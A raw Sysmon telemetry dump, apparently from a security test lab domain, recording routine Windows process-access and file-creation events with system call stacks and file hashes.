.dll+1ae1c 10341000x80000000000000001048501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.201{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C
:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.154{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.154{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:44.154{466BC892-02BC-60E8-2C00-00000000CF01}30644868C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 23542300x80000000000000001048492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.017{466BC892-32DC-60E8-900B-00000000CF01}8936ATTACKRANGE\bobC:\Windows\system32\DllHost.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed DB\edb00004.logMD5=59978F80F9AF5478C84BE95B8BD5B394,SHA256=50818F161B242F1C756B0A400C31BB2BCB984318BF7E3C661C78C8B9594D01BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.001{466BC892-32DC-60E8-900B-00000000CF01}8936ATTACKRANGE\bobC:\Windows\system32\DllHost.exeC:\Users\bob\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\Indexed 
DB\edb00003.logMD5=AA300DD4047DD88BB35D811438DDEF86,SHA256=2D6A2477C6D930A42B1CEB4B5C26A085EBF2EF90A6B2DD3BC17884B274022C3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.848{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34FB985FB21CC9B453BC99F106EA5438,SHA256=95690726A0ADA7FC1C4542EB7BD082E76B94BC7EBB2A6AEF30FCA8AEFD07DA26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:45.212{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1188C9807A6A0BF85504285CB69F194F,SHA256=D2ABE9E67EBE0E32C20DEFDA43AF2C49C9FC165218539CCAC2BF5B369453CCB4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.584{466BC892-02AF-60E8-1300-00000000CF01}9761444C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.568{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-F491-60EB-277D-00000000CF01}97561880C:\Windows\System32\consent.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x70C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\consent.exe+1452|C:\Windows\System32\consent.exe+3ca7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.568{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.553{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.537{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.537{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.537{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:45.537{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.537{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
